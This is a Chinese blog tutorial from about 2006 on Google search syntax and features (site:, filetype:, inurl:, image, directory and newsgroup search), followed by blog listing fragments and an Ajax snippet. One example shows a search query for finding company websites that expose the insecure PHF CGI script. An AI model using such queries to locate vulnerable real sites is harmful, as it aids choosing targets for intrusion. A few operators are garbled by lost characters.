如何来描述这种变迁呢?以前的学习,一般需要预先在肚子里存储下足够的知识,必要时,就从海量的信息中提取所需的部分。这种学习方式造就了很多 “才高八斗,学富五车”的大才子。但是,到了信息领域大大超出“四书五经”的新时期,预先无目的的吞下海量信息的学习方式就有些不合时宜了。比方说,我们到了大型的图书城,往往有一种不知所措的感觉。旧有的学习方式需要变更以适应这个信息爆炸的年代。目的明确的去学习,即先知道要学什么,然后有目的的去寻找答案,这种方式看上去更加有效率。我不妨把这称为“即学式”,相应的,旧有的称为“预学式”。
不过,“即学式”的实施是有前提的。首先,要求学习者拥有一个包罗万象的信息库,以供随时抽取各种目的信息;其次,是需要一个强劲的信息检索工具,以便高效率的从信息库中提取信息。很明显,Internet可以充当那个海量的信息库,而搜索引擎,则正是寻找光明之火的绝好工具。
“公欲善其事,必先利其器”。Internet只有一个,而搜索引擎则有N多个。有搜索高手说,所谓搜索,就是“在正确的地方使用正确的工具和正确的方法寻找正确的内容”。但是,对于普通人而言,掌握诸多搜索引擎的可能性似乎不大。用一两个相对强劲的具代表性的工具达到绝大多数搜索目的更为人们所迫切希望。不同的时期,涌现出不同的强者。就目前而言,我们非常幸运的有了: *****Google******
2,摘要
本文简要的介绍了Google的历史和特点,Google的基本搜索语法和高级搜索语法,Google的特色功能,包括图片搜索、新闻组搜索和集成工具条等。尽管本文名为“Google搜索从入门到精通”,但事实上,本文只能算是对Google的一个并不十分完全的介绍而已。
3,如何使用本文
阅读本文最好具备一些最基本的布尔代数基础,如“与”、“或”、“非”等。不过,即便你没有这方面的知识,也不必在意。对那些实例进行练习,你的疑惑就会迎刃而解。对于刚刚接触网络搜索的读者而言,也许你应该从头到尾的阅读本文;但对于那些有一定搜索基础的读者而言,只需要跳跃着寻找自己所需要的信息就可以了。此外,你也可以参考中文Google大全:
http://www.Google.com/intl/zh-CN/about.html
,以及搜索帮助:
http://www.google.com/intl/zh-CN/help.html
,那是官方Google使用手册以及问题解答中心。
4,Google简介
Google(
www.Google.com
)是一个搜索引擎,由两个斯坦福大学博士生Larry Page与Sergey Brin于1998年9月发明,Google Inc. 于1999年创立。2000年7月份,Google替代Inktomi成为Yahoo公司的搜索引擎,同年9月份,Google成为中国网易公司的搜索引擎。98年至今,Google已经获得30多项业界大奖。到Google的新闻中心(http: //www.Google.com/press/index.html),你可以找到关于一切关于Google的历史和新闻资料。
Google的成功得益于其强大的功能和独到的特点:
Google检索网页数量达24亿,搜索引擎中排名第一; Google支持多达132种语言,包括简体中文和繁体中文; Google网站只提供搜索引擎功能,没有花里胡哨的累赘; Google速度极快,年初时据说有15000多台服务器,200多条T3级宽带; Google的专利网页级别技术PageRank能够提供准确率极高的搜索结果; Google智能化的“手气不错”功能,提供可能最符合要求的网站; Google的“网页快照”功能,能从Google服务器里直接取出缓存的网页。
Google具有独到的图片搜索功能; Google具有强大的新闻组搜索功能; Google具有二进制文件搜索功能(PDF,DOC,SWF等); Google还有很多尚在开发阶段的令人吃惊的设想和功能。 等等
5,搜索入门
要用Google做搜索,当然首先要进Google网站--www.Google.com;不过,163.com和yahoo.com.cn使用的实际上也是Google搜索引擎,只是对搜索结果进行了编排,而且无法提供一些特色功能,如图片搜索等。因此,如果你要搜索网页的话,就直接使用 Google.com吧。
第一次进入Google,它会根据你的操作系统,确定语言界面。需要提醒的是,Google是通过cookie来存储页面设定的,所以,如果你的系统禁用cookie,就无法对Google界面进行个人设定了。
Google的首页很清爽,LOGO下面,排列了四大功能模块:网站、图像、新闻组和目录服务。默认是网站搜索。现在进行第一次搜索实践,假定你是个搜索新手,想要了解一下搜索引擎的来龙去脉和搜索技巧。在搜索框内输入一个关键字“搜索引擎”,选中“搜索中文(简体)网页”选项,然后点击下面的 “Google搜索”按钮(或者直接回车),结果就出来了。 搜索:“搜索引擎” 结果:已搜索有关搜索引擎的中文(简体)网页。 共约有707,000项查询结果,这是第1-10项 。 搜索用时0.08秒。
仔细看一下搜索结果的前十项,就会发现绝大部分链接是搜索引擎本身,而不是对搜索引擎的或者搜索技巧方面的介绍。
注意:文章中搜索语法外面的引号仅起引用作用,不能带入搜索栏内。
6,初阶搜索
上例是最基本的搜索,即查询包含单个关键字的信息。但是,你可以发现,上例中,单个关键字“搜索引擎”,搜索得的信息浩如烟海,而且绝大部分并不符合自己的要求,怎么办呢?我们需要进一步缩小搜索范围和结果。
6.1,搜索结果要求包含两个及两个以上关键字
一般搜索引擎需要在多个关键字之间加上“ ”,而Google无需用明文的“ ”来表示逻辑“与”操作,只要空格就可以了。现在,我们需要了解一下搜索引擎的历史,因此期望搜得的网页上有“搜索引擎”和“历史”两个关键字。
示例:搜索所有包含关键词“搜索引擎”和“历史”的中文网页 搜索:“搜索引擎 历史” 结果:已搜索有关搜索引擎 历史的中文(简体)网页。 共约有78,600项查询结果,这是第1-10项 。 搜索用时0.36秒。
用了两个关键字,查询结果已经从70多万项减少到7万多项。但查看一下搜索结果,发现前列的绝大部分结果还是不符合要求,大部分网页涉及的“历史”,并不是我们所需要的“搜索引擎的历史”。怎么办呢?删除与搜索引擎不相关的“历史”。我们发现,这部分无用的资讯,总是和“文化”这个词相关的,另外一些常见词是“中国历史”、“世界历史”、 “历史书籍”等。
6.2,搜索结果要求不包含某些特定信息
Google用减号“-”表示逻辑“非”操作。“A ?B”表示搜索包含A但没有B的网页。
示例:搜索所有包含“搜索引擎”和“历史”但不含“文化”、“中国历史”和“世界历史”的中文网页 搜索:“搜索引擎 历史 -文化 -中国历史 -世界历史” 结果:已搜索有关搜索引擎 历史 -文化 -中国历史 -世界历史的中文(简体)网页。 共约有36,800项查询结果,这是第1-10项 。 搜索用时0.22秒。
我们看到,通过去掉不相关信息,搜索结果又减少了将近一半。第一个搜索结果是:
搜索引擎直通车≡搜索引擎发展历史 搜索引擎直通车, ... 搜索引擎专业介绍站点. ...
www.se-express.com/about/about.htm
- 14k - 网页快照 - 类似网页
非常符合搜索要求。另外,第八项搜索结果:
463搜索王 本站检索 整个网站 在此输入关键词. 你的当前 位置:首页 >> Internet搜索手册 >> 搜索引擎的历史. ...
www.cnco.net/search/history.htm
- 21k - 网页快照 - 类似网页
也符合搜索要求。但是,10个结果只有两个符合要求,未免太少了点。不过,在没有更好的策略之前,不妨先点开一个结果看看。点开se- express.com的这个名为“搜索引擎发展历史”的网页,我们发现,搜索引擎的历史,是与互联网早期的文件检索工具“Archie”息息相关的。此外,搜索引擎似乎有个核心程序,叫“蜘蛛”,而最早成型的搜索引擎是“Lycos”,使搜索引擎深入人心的是“Yahoo”。了解了这些信息,我们就可以进一步的让搜索结果符合要求了。
注意:这里的“ ”和“-”号,是英文字符,而不是中文字符的“+”和“-”。此外,操作符与作用的关键字之间,不能有空格。比如“搜索引擎 - 文化”,搜索引擎将视为关键字为“搜索引擎”和“文化”的逻辑“与”操作,中间的“-”被忽略。
6.3,搜索结果至少包含多个关键字中的任意一个。
Google用大写的“OR”表示逻辑“或”操作。搜索“A OR B”,意思就是说,搜索的网页中,要么有A,要么有B,要么同时有A和B。在上例中,我们希望搜索结果中最好含有“archie”、“lycos”、“蜘蛛”等关键字中的一个或者几个,这样可以进一步的精简搜索结果。
示例:搜索如下网页,要求必须含有“搜索引擎”和“历史”,没有“文化”,可以含有以下关键字中人任何一个或者多个:“Archie”、“蜘蛛”、“Lycos”、“Yahoo”。 搜索:“搜索引擎 历史 archie OR 蜘蛛 OR lycos OR yahoo -文化” 结果:已搜索有关搜索引擎 历史 archie OR 蜘蛛 OR lycos OR yahoo -文化的中文(简体)网页。 共约有8,400项查询结果,这是第1-10项 。 搜索用时0.16秒。
我们看到,搜索结果缩小到8千多项,前20项结果中,大部分都符合搜索要求。如果你想了解一下解搜索引擎的历史发展,就不妨研究一下现在搜索到的结果吧。 注意:“与”操作必须用大写的“OR”,而不是小写的“or”。
在上面的例子中,我介绍了搜索引擎最基本的语法“与”“非”和“或”,这三种搜索语法Google分别用“ ”(空格)、“-”和“OR”表示。顺着上例的思路,你也可以了解到如何缩小搜索范围,迅速找到目的资讯的一般方法:目标信息一定含有的关键字(用“ ”连起来),目标信息不能含有的关键字(用“-”去掉),目标信息可能含有的关键字(用“OR”连起来)。
7,杂项语法
7.1,通配符问题
很多搜索引擎支持通配符号,如“*”代表一连串字符,“?”代表单个字符等。Google对通配符支持有限。它目前只可以用“*”来替代单个字符,而且包含“*”必须用""引起来。比如,“"以*治国"”,表示搜索第一个为“以”,末两个为“治国”的四字短语,中间的“*”可以为任何字符。
7.2,关键字的字母大小写
Google对英文字符大小写不敏感,“GOD”和“god”搜索的结果是一样的。
7.3,搜索整个短语或者句子
Google的关键字可以是单词(中间没有空格),也可以是短语(中间有空格)。但是,用短语做关键字,必须加英文引号,否则空格会被当作“与”操作符。
示例:搜索关于第一次世界大战的英文信息。 搜索:“"world war I"” 结果:已向英特网搜索"world war i". 共约有937,000项查询结果,这是第1-10项 。 搜索用时0.06秒。
7.4,搜索引擎忽略的字符以及强制搜索
Google对一些网路上出现频率极高的英文单词,如“i”、“com”、“www”等,以及一些符号如“*”、“.”等,作忽略处理。
示例:搜索关于www起源的一些历史资料。 搜索:“www的历史 internet” 结果:以下的字词因为使用过于频繁,没有被列入搜索范围: www 的. 已搜索有关www的历史 internet的中文(简体)网页。 共约有75,100项查询结果,这是第1-10项 。 搜索用时0.22秒。
我们看到,搜索“www的历史 internet”,但搜索引擎把“www”和“的”都省略了。于是上述搜索只搜索了“历史”和“internet”。这显然不符合要求。这里我顺便说一点搜索引擎分词的知识。当我们在搜索“www的历史”的时候,搜索引擎实际上把这个短语分成三部分,“www”、“的”和“历史”分别来检索,这就是搜索引擎的分词。所以尽管你输入了连续的“www的历史”,但搜索引擎还是把这个短语当成三个关键字分别检索。
如果要对忽略的关键字进行强制搜索,则需要在该关键字前加上明文的“+”号。 搜索:“+www +的历史 internet” 结果:已搜索有关+www +的历史 internet的中文(简体)网页。 共约有25,000项查询结果,这是第1-10项 。 搜索用时0.05秒。
另一个强制搜索的方法是把上述的关键字用英文双引号引起来。在上例“”world war I””中,“I”其实也是忽略词,但因为被英文双引号引起来,搜索引擎就强制搜索这一特定短语。
搜索:“"www的历史" internet” 结果:已搜索有关"www的历史" internet的中文(简体)网页。 共约有7项查询结果,这是第1-6项 。 搜索用时0.26秒。
我们看到,这一搜索事实上把“www的历史”作为完整的一个关键字。显然,包含这样一个特定短语的网页并不是很多,不过,每一项都很符合要求。
注意:大部分常用英文符号(如问号,句号,逗号等)无法成为搜索关键字,加强制也不行。
8,进阶搜索
上面已经探讨了Google的一些最基础搜索语法。通常而言,这些简单的搜索语法已经能解决绝大部分问题了。不过,如果想更迅速更贴切找到需要的信息,你还需要了解更多的东西。
8.1,对搜索的网站进行限制
“site”表示搜索结果局限于某个具体网站或者网站频道,如“
www.sina.com.cn
”、“edu.sina.com.cn”,或者是某个域名,如“com.cn”、“com”等等。如果是要排除某网站或者域名范围内的页面,只需用“-网站/域名”。
示例:搜索中文教育科研网站(edu.cn)上关于搜索引擎技巧的页面。 搜索:“搜索引擎 技巧 site:edu.cn” 结果:已搜索有关搜索引擎 技巧 site:edu.cn的中文(简体)网页。 共约有608项查询结果,这是第1-10项 。 搜索用时0.05秒。
示例:上著名IT门户网站ZDNET和CNET搜索一下关于搜索引擎技巧方面的资讯。 搜索:“"search engine" tips site:
www.zdnet.com
OR site:
www.cnet.com
” 结果:已在
www.zdnet.com
内搜索有关"search engine" tips OR site:
www.cnet.com
的网页。 共约有1,040项查询结果,这是第1-10项 。 搜索用时0.09秒。
注意,在这里Google有个小BUG。“已在
www.zdnet.com
内搜索…”,其实应该表述成“已在
www.zdnet.com
和
www.cnet.com
内搜索…”。
示例:搜索新浪科技频道中关于搜索引擎技巧的信息。 搜索:“搜索引擎 技巧 site:tech.sina.com.cn” 结果:已在tech.sina.com.cn搜索有关搜索引擎 技巧 的中文(简体)网页。 共约有163项查询结果,这是第1-10项 。 搜索用时0.07秒。
注意:site后的冒号为英文字符,而且,冒号后不能有空格,否则,“site:”将被作为一个搜索的关键字。此外,网站域名不能有“http://”前缀,也不能有任何“/”的目录后缀;网站频道则只局限于“频道名.域名”方式,而不能是“域名/频道名”方式。
8.2,在某一类文件中查找信息
“filetype:”是Google开发的非常强大实用的一个搜索语法。也就是说,Google不仅能搜索一般的文字页面,还能对某些二进制文档进行检索。目前,Google已经能检索微软的Office文档如.xls、.ppt、.doc,.rtf,WordPerfect文档,Lotus1 - 2-3文档,Adobe的.pdf文档,ShockWave的.swf文档(Flash动画)等。其中最实用的文档搜索是PDF搜索。PDF是ADOBE 公司开发的电子文档格式,现在已经成为互联网的电子化出版标准。目前Google检索的PDF文档大约有2500万左右,大约占所有索引的二进制文档数量的80%。PDF文档通常是一些图文并茂的综合性文档,提供的资讯一般比较集中全面。
示例:搜索几个资产负债表的Office文档。 搜索:“资产负债表 filetype:doc OR filetype:xls OR filetypept” 结果:已搜索有关资产负债表 filetype:doc OR filetype:xls OR filetypept的中文(简体)网页。 共约有481项查询结果,这是第1-10项 。 搜索用时0.04秒。
注意,下载的Office文件可能含有宏病毒,谨慎操作。
示例:搜索一些关于搜索引擎知识和技巧方面的PDF文档 搜索:?"search engine" tips OR tutorial filetypedf” 结果:已向英特网搜索"search engine" tips OR tutorial filetypedf. 共约有12,600项查询结果,这是第1-10项 。 搜索用时0.22秒。
我们来看其中的一个结果:
[PDF]Search Engines Tips 文档类型: PDF/Adobe Acrobat - HTML 版 ...
http://www.google.com/press/zeitgeist.html
See what people are searching on at Google.com * Search Engine Watch
http://searchenginewatch.com/
Some free tips ...
http://www.allvertical.com/PromoKits...EngineTips.pdf
- 类似网页
可以看到,Google用[PDF]来标记这是一个PDF的文档检索,另外,它还给出了该PDF文档的HTML版本,该HTML版保留了文档的文字内容和结构,但没有图片。
8.3,搜索的关键字包含在URL链接中
“inurl”语法返回的网页链接中包含第一个关键字,后面的关键字则出现在链接中或者网页文档中。有很多网站把某一类具有相同属性的资源名称显示在目录名称或者网页名称中,比如“MP3”、“GALLARY”等,于是,就可以用INURL语法找到这些相关资源链接,然后,用第二个关键词确定是否有某项具体资料。INURL语法和基本搜索语法的最大区别在于,前者通常能提供非常精确的专题资料。 示例:查找MIDI曲“沧海一声笑”。 搜索:“inurl:midi “沧海一声笑”” 结果:已搜索有关inurl:midi "沧海一声笑"的中文(简体)网页。 共约有27项查询结果,这是第1-10项 。 搜索用时0.34秒。
注意:“inurl:”后面不能有空格,Google也不对URL符号如“/”进行搜索。例如,Google会把“cgi-bin/phf”中的“/”当成空格处理。
“allinurl”语法返回的网页的链接中包含所有作用关键字。这个查询的关键字只集中于网页的链接字符串。
示例:查找可能具有PHF安全漏洞的公司网站。通常这些网站的CGI-BIN目录中含有PHF脚本程序(这个脚本是不安全的),表现在链接中就是“域名/cgi-bin/phf”。 搜索:“allinurl:"cgi-bin" phf +com” 结果:已向英特网搜索allinurl:"cgi-bin" phf +com. 共约有51项查询结果,这是第1-10项 。 搜索用时0.11秒。
8.4,搜索的关键字包含在网页标题中
“intitle”和“allintitle”的用法类似于上面的inurl和allinurl,只是后者对URL进行查询,而前者对网页的标题栏进行查询。网页标题,就是HTML标记语言title中之间的部分。网页设计的一个原则就是要把主页的关键内容用简洁的语言表示在网页标题中。因此,只查询标题栏,通常也可以找到高相关率的专题页面。 示例:查找日本明星藤原纪香的照片集。 搜索:“intitle:藤原纪香 "写真集"” 结果:已搜索有关intitle:藤原纪香 "写真集"的中文(简体)网页。 共约有315项查询结果,这是第1-10项 。 搜索用时0.15秒。
8.5,搜索的关键字包含在网页的“锚”(anchor)链点内
所谓“锚”,就是在同一个网页中快速切换链接点。与URL和TITLE类似,Google提供了两种对anchor的检索,“inanchor”和“allincnchor”。对此不作详述。
9,其他罕用语法
9.1,搜索所有链接到某个URL地址的网页
如果你拥有一个个人网站,估计很想知道有多少人对你的网站作了链接。而“link”语法就能让你迅速达到这个目的。
示例:搜索所有含指向华军软件园“
www.newhua.com
”链接的网页。 搜索:“link:
www.newhua.com
” 结果:搜索有链接到
www.newhua.com
的网页 。 共约有920项查询结果,这是第1-10项 。 搜索用时0.12秒。
注意:“link”不能与其他语法相混合操作,所以“link:”后面即使有空格,也将被Google忽略。另外还要说明的是,link只列出Google索引链接很小一部分,而非全部,所以如果你用Google没有搜到链到你的主页的链接,也不必灰心丧气。
除了上述功能,link语法还有其它妙用。一般说来,做友情链接的网站都有相似地方。这样,你可以通过这些友情链接,找到一大批具有相似内容的网站。比如说,你是个天文爱好者,你发现某网站非常不错,那么,可以用link语法查一下与之做链接的网站,也许可以找到更多符合你兴趣的内容。
9.2,查找与某个页面结构内容相似的页面
“related”用来搜索结构内容方面相似的网页。例:搜索所有与中文新浪网主页相似的页面(如网易首页,搜狐首页,中华网首页等), “related:wwwsina.com.cn/index.shtml”。我到现在也不明白这个语法有什么作用,如果有谁知道,请不吝指教。预先感谢。
9.3,从Google服务器上缓存页面中查询信息
“cache”用来搜索Google服务器上某页面的缓存,通常用于查找某些已经被删除的死链接网页,相当于使用普通搜索结果页面中的“网页快照”功能。
其它罕用语法如info、stock等不一一介绍,有兴趣的读者可以参阅Google大全。
10,图片搜索
Google自称可以检索390,000,000张图片,并称自己为“互联网上最好用的图像搜索工具”。从使用结果来看,Google的图片搜索的确不错,但个人以为比AltaVista的还是要差一些,主要体现在检索图片数量比不上AV,匹配度比AV的图片搜索器也差了些。但AltaVista 国内用户无法正常访问,因此对中国用户而言,Google的图片搜索引擎已经是最好的了。
Google首页点击“图像”链接就进入了Google的图像搜索界面“images.Google.com”。你可以在关键字栏位内输入描述图像内容的关键字,如“britney spears”,就会搜索到大量的小甜甜布兰妮的图片。我目前尚不是很清楚图片的排列标准,不过以观察来看,似乎图片文件名完全符合关键字的结果排列比较考前,然后才按照普通的页面搜索时的标准排列。
Google给出的搜索结果具有一个直观的缩略图(THUMBNAIL),以及对该缩略图的简单描述,如图像文件名称,以及大小等。点击缩略图,页面分成两祯,上祯是图像之缩略图,以及页面链接,而下祯,则是该图像所处的页面。屏幕右上角有一个“Remove Frame”的按钮,可以把框架页面迅速切换到单祯的结果页面,非常方便。
Google图像搜索目前支持的语法包括基本的搜索语法如“ ”、“-”、“OR”、“site”和 “filetype:”。其中“filetype:”的后缀只能是几种限定的图片类似,如JPG,GIF等。
示例:查找新浪网上本拉登的图片 搜索:“拉登 OR 拉丹 site:sina.com.cn” 结果:搜索有关 拉登 OR 拉丹 site:sina.com.cn 的图片。 共有6项查询结果,这是第1-6项。 搜索用时0.36秒。
这里我想说明一点的是,images.google.com作为专门的图片搜索引擎,实际上有其特殊的用途。
举个例子,互联网上本拉登的照片成千上万,但是,它们都是分散的,往往随机的分布于各种新闻报道中。如果用搜索图片库的方式(最容易想到的如 “Ben Ladin photo”),来搜索本拉登的照片,显然是不恰当的,因为很少有人专门为拉登建一个在线相册。在这个时候,images.google.com就派上用场了。
但是,如果查找的图片在网上有很多主题“gallary”,如诸多电影电视明星的照片,则明显就不适合用images.google.com来查找了。
images.google.com对于很多报纸杂志的编辑,绝对是一个雪中送炭式的工具。比如要在某个版面上插一张专题图片,用google的图片搜索功能几秒钟就可以搞定。
综上,可以有这样的一般性结论:如果要搜索的图片是分散的,则用google图片搜索;如果要搜索的图片通常是处于某个图片集合中的,则不适合用google图片搜索。
11,目录检索
如果不想搜索广泛的网页,而是想寻找某些专题网站,可以访问Google的分类目录“http: //directory.Google.com/”,中文目录是“http: //directory.Google.com/Top/World/Chinese_Simplified/”。分类的网站目录一般由专人负责,分类明确,信息集中。因此读者应该养成这样的习惯:首先考虑所需要的信息能否在一个专门主题的网站上找到。不过需要说明的是,用目录检索,往往需要用户对查询的领域很熟悉。否则,连查询的内容属于哪个类目都不知道,目录浏览也就无从谈及了。目前Google使用的分类目录采用了ODP的内容。“Open Directory Project”是网景公司所主持的一项大型公共网页目录。由全世界各地的义务编辑人员来审核挑选网页,并依照网页的性质及内容来分门别类。因此,在某一目录门类中进行搜索往往能有更高的命中率。另外,Google根据其专业的“网页级别”(PageRank)技术对目录中登录的网站进行了排序,可以让一般的检索更具高效率。
示例:查找一下介绍搜索引擎方面的中文网站 搜索:先进入中文简体分类目录,再进入“计算机”目录,再进入“互联网络”子目录,再进入“搜寻”子目录。我们看到在“World > Chinese Simplified > 计算机 > 互联网络 > 搜寻”下,还有两个子目录“分类目录 (33) 搜索引擎 (10)”,以及6个相关网站。显然,这些都是我们所需要的信息。
除了用鼠标层层点入,也可以在目录中检索。比如,在上例的“互联网络”目录下,选中“只在互联网络中搜索”选项,在搜索栏内填入“搜索引擎”进行搜索。 结果:在分类Google 网页目录项中搜索搜索引擎。 共约有387项查询结果,这是第11-20项 。 搜索用时0.09秒。
可以看到,上述查询结果比普通的检索更有效,因为在分类“互联网络”下进行搜索剔除了很多不相关的诸如新闻之类的无效信息。不过,对于中文用户而言,现在最大的问题是志愿的中文目录编辑太少,导致收录站点太少,因此搜索结果范围显得过于狭隘。但愿这个问题能随着Google以及ODP项目在国内名声的响亮而能得到改观。
12,新闻组搜索
新闻组有详尽的分类主题,某些主题还有专人管理和编辑,具有大量的有价值信息。由于新闻组包含的信息实在是海量,因此不利用工具进行检索是不大可能的。 DEJA一直是新闻组搜索引擎中的佼佼者。2001年2月份,Google将DEJA收购并提供了所有DEJA的功能。现在,除了搜索之外, Google还支持新闻组的WEB方式浏览和张贴功能。
进入Google新闻组“
http://groups.Google.com/
”,你有两种信息查找方式。一种是一层层的点击进入特定主题讨论组,另一种则是直接搜索。现在,我们进行一个最简单的搜索试验,查找一下新闻组中关于山顶洞人的讨论信息。
搜索:“山顶洞人” 结果:在各群组内搜索 山顶洞人 共约有2,400项查询结果,这是第1-10项 。 搜索用时0.94秒。 搜索结果默认按照“留言内容”排列,但是你也可以点击“依照日期”按钮,让帖子按照发布日期排列。
因为新闻组中的帖子实在是多,而且又涉及一些普通搜索所没有的语法,所以建议使用“高级群组搜寻”进入高级搜索界面。新闻组高级搜索提供留言内容、分类主题、标题、留言者、留言代码、语言和发布日期作为条件进行搜索。其中作者项指作者发帖所用的唯一识别号电子信箱。
13,Google的其他杰出功能
13.1网页快照
网页快照是Google抓下来缓存在服务器上的网页。它有三个作用:
第一, 如果原地址打开很慢,那么可以直接查看Google缓存页面,因为Google服务器速度极快。
第二, 如果原链接已经死掉或者因为网络的原因暂时链接不通,那么可以通过Google快照看到该页面信息。当然,快照内容不是该页最新页面。
第三, 如果打开的页面信息量巨大,一下子找不到关键词所在位置,那么可以通过Google快照,因为快照中Google用黄色表明关键字位置。
13.2,集成化的工具条
为了方便搜索者,Google提供了工具条,集成于浏览器中,用户无需打开Google主页就可以在工具条内输入关键字进行搜索。此外,工具条还提供了其他许多功能,如显示页面PageRank等。最方便的一点在于用户可以快捷的在Google主页、目录服务、新闻组搜索、高级搜索和搜索设定之间切换。欲安装Google的工具条,可以访问“
http://toolbar.Google.com/
”,按页面提示可以自动下载并安装。不过, Google工具条目前只支持IE5.0以上版本。
对于经常进行网络搜索者而言,Google工具条实在是必备的东西!!
13.3,单词英文解释
写英文文章的时候,最头疼的事情就是对某个英文单词的用法不确定。现在有了Google,一切就迎刃而解了!无论你是想查找某个生词的意思还是想了解某个单词的用法,均可使用在线词典。
进入英文Google,输入你要查的单词。举个例子,我想查一下suggest的用法。结果如下:“Searched the web for suggest. Results 1 - 10 of about 8,000,000. Search took 0.08 seconds. ”注意看上面句子中,单词suggest下出现了一个横线,点击这个链接,就跳转到另外一个网站“http: //www.dictionary.com/”,Google已经把单词提交给该网站的查询脚本。看看这个网站所提供的详尽解释吧。
13.4,网页翻译
你懂英文,但是你不见得就懂德文、法文、拉丁文。如果搜索出来的页面是这些语言怎么办?呵呵,Google提供了网页翻译功能!!虽然目前只支持有限的拉丁语、法语、西班牙语、德语和葡萄牙文,但是我不得不承认,这是个杰出功能。
试着做以下搜索:“big bang site:fr”。这个表示查找关于宇宙大爆炸的法文网页。看第一条结果:
The Big Bang Website - [ Translate this page ] ... A propos de Big Bang. Le dernier numéro en date. Les anciens numéros. Autres activités. Concerts progressifs en France. Emissions de radio. Liens. perso.club-internet.fr/calyx/bigbang/ - 3k - Cached - Similar pages
有点晕。没关系,点击“Translate this page”按钮。再看结果,嗯,大致能看明白,这原来是个叫“big bang”的乐队的网站,与大爆炸无关...
机器翻译是一个很前沿的人工智能课题,想指望翻译出来的结果跟专门用英语撰写的内容是不可能的。但西文间的互相转译比中英文机译强得多得多了。至少能看明白。
13.5,单词纠错
笔者记忆力很差,英文单词经常拼写错误。但Google有纠错功能。比如在写上文的时候,我要用到英文单词“tutorial”,我只是依稀记得好像是 “tatorial”的样子,但不肯定,于是用Google查了一下,它马上提醒:“您要找的会不会是: tutorial ”,呵呵,正是这个单词。
13.6,繁简转换
对中文用户而言,常希望能同时检索繁体和简体信息。Google能做到这一点。Google默认使用繁简自动转换功能,因此你输入的简体关键字也将被转换成繁体做检索。这样省了不少力气。当然,如果你不希望这样的话,也可以在“使用偏好”中把这个选项关掉。
13.7,搜索结果过滤
网络上的成人内容浩如烟海,而且很多站点具有欺骗或者其他不良企图,浏览者很容易掉入其中的陷阱。为此,Google新设立了成人内容过滤功能,见Google的设置页面,
http://www.Google.com/preferences
,最底下有一个选项SafeSearch Filtering。不过,中文状态下的Google尚没有这个功能。
14,Google尚未发布的一些新特性和功能
14.1,对网页更新日期做出限定“daterange:”
评价一个搜索引擎的好坏,更新频率是一个很关键因素。通常情况下,我们总希望能找到最新的网页。Google已经开发了对更新日期做限定的搜索语法,但目前还未公布。而且比较麻烦的是,Google现在支持的日期格式为julian(凯撒日)格式,把通用日期数值切换成julian格式需要借助第三方网站:
http://www.tesre.bo.cnr.it/~mauro/JD/
。不过,在下面这个自称是“Google终极搜索界面”的网页上,你已经可以利用Google的这项新特性了,它自动提供日期转换功能。
Google Ultimate Interface:
http://www.faganfinder.com/google.html
Google为什么要这样做呢?也许是在测试阶段,不想让太多人使用吧。
14.2,新闻搜索“
http://news.google.com/
”
Google的新闻搜索尚在B测试阶段,但使用起来已经非常不错了。新闻首页按头条新闻,各国新闻,以及不同领域做了分类。你可以通过Google搜索各大门户和新闻网站的新闻,简单、快捷、方便。遗憾的是,目前Google新闻只检索英文信息。
14.3,分类广告搜索“
http://catalogs.google.com/
”
这也在B测试阶段。主要是对电子分类广告做检索。广告页为JPG图片格式。
14.4,其它Google的最新发展动态
想了解Google公司的工程师们都在忙些什么吗?去看一下Google实验室(
http://labs.google.com/
)吧。Google的最新设想都在这个地方向访问者展现出来。现在处于发展和试验阶段的新功能有:术语查询、语音查询、键盘查询等等。
网络工程师和程序员可以看看这个地方:
http://www.google.com/apis/
,我想可以让你喜出望外的。
14.5,一个有趣的地方
想看看世界各国网民都用Google搜索什么信息么?到
http://www.google.com/press/zeitgeist.html
看一下就知道了。从这些资讯中,你大致可以了解到世界热点和流行时尚走向。
15,后记
这个文章4.0版本与3.0版本相比,变更很大,主要把一些与Google无关的东西删除了,另外随Google的变化作了一些修正,并增加了一些 Google尚未发布的新功能。关于搜索技巧和搜索实例,是各个搜索引擎共通的东西,是搜索者长期的经验积累,要写出来,是件工程很浩大的事情,因此在这个小文章中我就不献丑了。
随着时间的推移,我发现搜索已经成为网络生活的一部分。工作需要搜索技术文档、客户信息;购物需要搜索商品信息和指南;娱乐需要搜索相关背景资料和图片。搜索已经变得无处不在,而Google则相应的成了工作和生活中的一个必备工具。套用雅虎的一句广告词,我们也许应该这样说:“今天你 Google 了吗?”
|
posted @
2006-11-23 13:11 MEYE 阅读(387) |
评论 (0) |
编辑 收藏
摘要: http://www.cnitblog.com/woo/archive/2005/11/05/3907.html
Linux系统新手学习的11点建议
Posted on 2005-11-05 09:17 stone 阅读(330) 评论(1) 编辑 收藏收藏至365Key 所属分类: Unix/Linuix/...
阅读全文
posted @
2006-11-20 12:36 MEYE 阅读(2387) |
评论 (0) |
编辑 收藏
J2EE 学习资料下载 :
http://download.eimhe.com/http://www.blogjava.net/eyefly/archive/2006/11/18/81899.htmlhttp://www.blogjava.net/youxia/archive/2006/10/17/75579.html
posted @
2006-11-18 13:22 MEYE 阅读(314) |
评论 (0) |
编辑 收藏
摘要: http://www.blogcn.com/user44/javatech/index.html
...
阅读全文
posted @
2006-11-06 21:38 MEYE 阅读(2017) |
评论 (0) |
编辑 收藏
知名公司校园招聘网申地址及截至日期【9月24日更新】
|
|
发布日期:2006-9-24 |
|
posted @
2006-11-06 17:38 MEYE 阅读(1065) |
评论 (0) |
编辑 收藏
http://book.devworld.cn/book/5
|
| | |
| AJAX基础教程 | snowsea 转贴 (参与分:16550,专家分:1160) 发表:2006-04-23 14:53 版本:1.0 阅读:810次 |
| 这篇文章将带您浏览整个AJAX的基本概貌,并展示两个简单的例子让您轻松上路.
什么是 AJAX? AJAX (异步 JavaScript 和 XML) 是个新产生的术语,专为描述JavaScript的两项强大性能.这两项性能在多年来一直被网络开发者所忽略,直到最近Gmail, Google suggest和google Maps的横空出世才使人们开始意识到其重要性.
这两项被忽视的性能是: 无需重新装载整个页面便能向服务器发送请求. 对XML文档的解析和处理.
步骤 1 ? "请!" --- 如何发送一个HTTP请求
为了用JavaScript向服务器发送一个HTTP请求, 需要一个具备这种功能的类实例. 这样的类首先由Internet Explorer以ActiveX对象引入, 被称为XMLHTTP. 后来Mozilla, Safari 和其他浏览器纷纷仿效, 提供了XMLHttpRequest类,它支持微软的ActiveX对象所提供的方法和属性.
因此, 为了创建一个跨浏览器的这样的类实例(对象), 可以应用如下代码:
if (window.XMLHttpRequest) { // Mozilla, Safari, ... http_request = new XMLHttpRequest(); } else if (window.ActiveXObject) { // IE http_request = new ActiveXObject("Microsoft.XMLHTTP"); }
